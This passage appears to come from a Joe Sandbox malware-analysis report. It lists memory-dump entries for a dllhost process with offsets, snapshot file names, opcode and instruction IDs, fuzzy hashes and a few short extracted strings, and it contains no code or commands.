                                                    • Source File: 00000037.00000002.2895561078.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_55_2_7ffd9b8a0000_dllhost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 10674e2f64c33fa7e3833f89c7e1f2b99cfc496dafe5d35a37d8e00ca63a1fa0
                                                    • Instruction ID: fba3d9c7d59fe45a7c52fbcc5acf462bca5bb5dd9c218c6d12c23138404bce03
                                                    • Opcode Fuzzy Hash: 10674e2f64c33fa7e3833f89c7e1f2b99cfc496dafe5d35a37d8e00ca63a1fa0
                                                    • Instruction Fuzzy Hash: 2D724830B0D90D8FEF68DB58886967873D1FF98300F1606B9D55EC32E6DE28AD428791
                                                    Memory Dump Source
                                                    • Source File: 00000037.00000002.2895561078.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_55_2_7ffd9b8a0000_dllhost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 986523e85d384baf077c6d057621140505e32d9c2e61a0c46c3ff74232a01892
                                                    • Instruction ID: 1f235061a32e8bfbeab9eb934ed3aa07ccca662f5a81fd2e591db49a358e1b1d
                                                    • Opcode Fuzzy Hash: 986523e85d384baf077c6d057621140505e32d9c2e61a0c46c3ff74232a01892
                                                    • Instruction Fuzzy Hash: A7911475A18A8D8FD78CDB6888697A9BFE0FF9A300F4002BAD149C72D6DF781415C341
                                                    Memory Dump Source
                                                    • Source File: 00000037.00000002.2895561078.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_55_2_7ffd9b8a0000_dllhost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e2c0361ea08d3e068ab34cc65cd79e5233918d219d6109d272177c6085778e24
                                                    • Instruction ID: 210e505ad8a15a290c8bb7e76061359f052a42d1b0eb4f84d8273469720aae5a
                                                    • Opcode Fuzzy Hash: e2c0361ea08d3e068ab34cc65cd79e5233918d219d6109d272177c6085778e24
                                                    • Instruction Fuzzy Hash: 8621B43130D8184FE768EB5CE88AEB977D1FB9932171505BAE58AC7136E911EC8287C1
                                                    Memory Dump Source
                                                    • Source File: 00000037.00000002.2895561078.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_55_2_7ffd9b8a0000_dllhost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4ed71990e7fc0b7895d3c19f40ff55dfe0fa2eaad7738266f10755bdfac0b93a
                                                    • Instruction ID: 5f4c08779016c0ffba6e768d0fc22e8d233d68fc78c990bfa78addaae7a33dc6
                                                    • Opcode Fuzzy Hash: 4ed71990e7fc0b7895d3c19f40ff55dfe0fa2eaad7738266f10755bdfac0b93a
                                                    • Instruction Fuzzy Hash: 5A212820B2D91D0FE758B76C546A67977D2EF9D311F0200B9E44EC32FBDD25AC424295
                                                    Memory Dump Source
                                                    • Source File: 00000037.00000002.2895561078.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_55_2_7ffd9b8a0000_dllhost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 22f75cfe707688c3fc6b09a94c0781057586c2862839006aad1ab9cacd7b5d03
                                                    • Instruction ID: 52d2c46fac1b812962deb644ca80a719cada619db946ac330d208d4ae9e7e26f
                                                    • Opcode Fuzzy Hash: 22f75cfe707688c3fc6b09a94c0781057586c2862839006aad1ab9cacd7b5d03
                                                    • Instruction Fuzzy Hash: 72212936B1D29D8BE712ABB8AC650EC7B60EF46325F0542F3D05CCB1D3D938264697A1
                                                    Memory Dump Source
                                                    • Source File: 00000037.00000002.2895561078.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_55_2_7ffd9b8a0000_dllhost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 24c6abc9a2651a25380c0c147093acb00979e800969820fb959a3500b04809ee
                                                    • Instruction ID: c0fa296f841cf2996f7885e41102f010c593514a2a4de6188c2611751f35750a
                                                    • Opcode Fuzzy Hash: 24c6abc9a2651a25380c0c147093acb00979e800969820fb959a3500b04809ee
                                                    • Instruction Fuzzy Hash: 73118131B1D90E4AEBB8EBD898A16FCB291FF4C711F410176D50ED32A2DE28AA448750
                                                    Memory Dump Source
                                                    • Source File: 00000037.00000002.2895561078.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_55_2_7ffd9b8a0000_dllhost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3a7a68018b1501032a8adc41ff329f201c5811d8f0ff5f2f0fecf1f4d2ebfe06
                                                    • Instruction ID: 762470e8f54c1536944a8fb5487c0ab36a5c38124221818847e2cb0bce6ec901
                                                    • Opcode Fuzzy Hash: 3a7a68018b1501032a8adc41ff329f201c5811d8f0ff5f2f0fecf1f4d2ebfe06
                                                    • Instruction Fuzzy Hash: D1012432B0E92C0B9638925D984A939B3C2EB9AB303161239D88EC3265CC10BC2343D0
                                                    Memory Dump Source
                                                    • Source File: 00000037.00000002.2895561078.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_55_2_7ffd9b8a0000_dllhost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a0f3a2e6b7d622ba9d92053fe9607164c0d444952ba6654715e721d5df87539a
                                                    • Instruction ID: 5bf5e54322165201e895d3914d603c5d7230567d327d92087220da53f832d332
                                                    • Opcode Fuzzy Hash: a0f3a2e6b7d622ba9d92053fe9607164c0d444952ba6654715e721d5df87539a
                                                    • Instruction Fuzzy Hash: 2311A331B1E68D8FE7129BB498601A87BA0EF56714F0645F3C048DB1A2D938260587A0
                                                    Memory Dump Source
                                                    • Source File: 00000037.00000002.2895561078.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_55_2_7ffd9b8a0000_dllhost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e53ac00640a6fdaa0dd58d6fe08a1b1d1abd1252192298d23c5833839474fe51
                                                    • Instruction ID: 205cb1b1e1352d129a7e4c357c1d1c9a334578d23a115ada5e3ee4b0f1de9182
                                                    • Opcode Fuzzy Hash: e53ac00640a6fdaa0dd58d6fe08a1b1d1abd1252192298d23c5833839474fe51
                                                    • Instruction Fuzzy Hash: F211A131E1E68D8FE712DBB498601A87BB0EF56714F0645F7C048DB1A2D93826498B60
                                                    Memory Dump Source
                                                    • Source File: 00000037.00000002.2895561078.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_55_2_7ffd9b8a0000_dllhost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 9a59139b4fa50f37d3c4eb704d72ff2a1445cb3282e9e41b005622304a19509b
                                                    • Instruction ID: dcd5b20387d01e03be0647cc81a8e5390a7bcaf8db1d48a8cba80f68d9a8a508
                                                    • Opcode Fuzzy Hash: 9a59139b4fa50f37d3c4eb704d72ff2a1445cb3282e9e41b005622304a19509b
                                                    • Instruction Fuzzy Hash: 6B01A721B1A50E8BEF74EFE8C5646B86392DF9C701F064175E40EC32F6DD28AE418750
                                                    Memory Dump Source
                                                    • Source File: 00000037.00000002.2895561078.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_55_2_7ffd9b8a0000_dllhost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e3baa0fd3b89923080fe375828d0efb6508c39452176d7964fe174cfe9177575
                                                    • Instruction ID: a9b3a887819165268ad6f8baf53c57a8ddb06e6387f9d565c2618cb44d6cae11
                                                    • Opcode Fuzzy Hash: e3baa0fd3b89923080fe375828d0efb6508c39452176d7964fe174cfe9177575
                                                    • Instruction Fuzzy Hash: 81019E31E1E28D9FD712DBB488A05987FB0EF56714F0641F7D048DB2A2E9386B45CBA1
                                                    Memory Dump Source
                                                    • Source File: 00000037.00000002.2895561078.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_55_2_7ffd9b8a0000_dllhost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 9f2e46f9d0008eb9745fdde3dd0f50d083c70bbb01a150aebdf52cf998ba7924
                                                    • Instruction ID: 7c721453261d4a0a52bcb7983eda40b66f6f28c471d31a34ef494931ee1e0439
                                                    • Opcode Fuzzy Hash: 9f2e46f9d0008eb9745fdde3dd0f50d083c70bbb01a150aebdf52cf998ba7924
                                                    • Instruction Fuzzy Hash: C3017C35908A58CFCB59EB18C895A9573F0FB68310F05069AD409D72A0DB34AE41CF80
                                                    Memory Dump Source
                                                    • Source File: 00000037.00000002.2895561078.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_55_2_7ffd9b8a0000_dllhost.jbxd
                                                    Strings
                                                    Similarity
                                                    • API ID:
                                                    • String ID: c9$!k9$"s9$#{9
                                                    • API String ID: 0-1692736845